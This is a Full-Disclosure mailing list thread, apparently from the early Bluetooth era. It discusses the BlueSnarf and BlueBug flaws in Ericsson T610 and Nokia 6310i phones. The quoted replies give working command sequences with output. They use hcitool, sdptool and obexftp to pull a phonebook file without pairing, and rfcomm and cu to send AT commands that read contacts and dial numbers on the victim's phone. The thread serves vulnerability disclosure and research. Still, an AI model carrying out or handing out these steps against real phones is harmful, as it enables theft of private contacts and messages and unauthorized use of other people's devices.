Re: Re: Bluetooth: BlueSnarf and BlueBug Full Disclusore

[Scott Renna <srenna () vdbmusic com>]

When I saw Adam's announcement a while back on these issues, I wrote a 
paper up for SANS.  Describes running the attack on FreeBSD based system 
against a T610.  Check out:

http://www.giac.org/practical/GCIA/Scott_Renna_GCIA.pdf



Eric Detoisien wrote:
> An easy way to get phonebook on Ericsson T610 via bluetooth without pairing  :
>
> tough:~# hcitool scan
>  Scanning ...
>         00:0A:D9:XX:XX:XX       T610
>
> tough:~# sdptool browse 00:0A:D9:XX:XX:XX
>  Browsing 00:0A:D9:XX:XX:XX ...
> [...]
> Service Name: OBEX Object Push
>  Service RecHandle: 0x10005
>  Service Class ID List:
>    "OBEX Object Push" (0x1105)
>  Protocol Descriptor List:
>    "L2CAP" (0x0100)
>    "RFCOMM" (0x0003)
>      Channel: 10 -----------------------> only RFCOMM channels 10 and 15 are open
>    "OBEX" (0x0008)
>  Profile Descriptor List:
>    "OBEX Object Push" (0x1105)
>      Version: 0x0100
> [...]
> Service Name: OBEX Basic Imaging
>  Service RecHandle: 0x1000b
>  Service Class ID List:
>    "" (0x111b)
>  Protocol Descriptor List:
>    "L2CAP" (0x0100)
>    "RFCOMM" (0x0003)
>      Channel: 15
>    "OBEX" (0x0008)
>  Profile Descriptor List:
>    "" (0x111a)
>      Version: 0x0100
> [...]
>
> tough:~# obexftp -b 00:0A:D9:XX:XX:XX -B 10 -g telecom/pb.vcf 
>  Browsing 00:0A:D9:FA:03:B7 ...
>  Channel: 7
>  No custom transport
>  Connecting...bt: 1
>  done
>  Receiving telecom/pb.vcf.../done
>  Disconnecting...done
>
>
> Eric Detoisien
>
>
>
> > The Bluebug, as described on [1] is trivially exploitable on some non-Symbian
> > Nokia phones. It allows attacker to create serial profile connection without
> > pairing or asking for permission, therefore it gives unauthorized access to all
> > AT commands. It is possible to read/delete/send SMS messages, add/view/delete
> > phonebook entries, change call diverts, initiate voice or data call.
> >
> > Demonstration on Nokia 6310i:
> >
> > laptop:~# hcitool scan
> > Scanning ...
> >         00:60:57:38:8C:D8       Nokia 6310i
> > laptop:~# rfcomm bind /dev/rfcomm0 00:60:57:38:8C:D8 17
> >
> > Now you can use plain AT commands, as described in manual [2] or Gnokii [3], for
> > example:
> >
> > laptop:~# cu -l rfcomm0 -s 9600
> > Connected.
> > [ATE1]
> > OK
> > ATI
> > Nokia
> >
> > OK
> > AT+CPBS?
> > +CPBS: "SM",0,100
> >
> > OK
> > AT+CPBR=?
> > +CPBR: (1-100),48,18
> >
> > OK
> > ATDT+48609xxxxxx
> > OK
> >
> > As you can see, the bug is really trivial and looks rather like backdoor.
> >
> > [1] - http://www.thebunker.net/security/bluetooth.htm
> > [2] - http://ncsp.forum.nokia.com/download/?asset_id=11579;ref=devx
> > [3] - http://www.gnokii.org/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html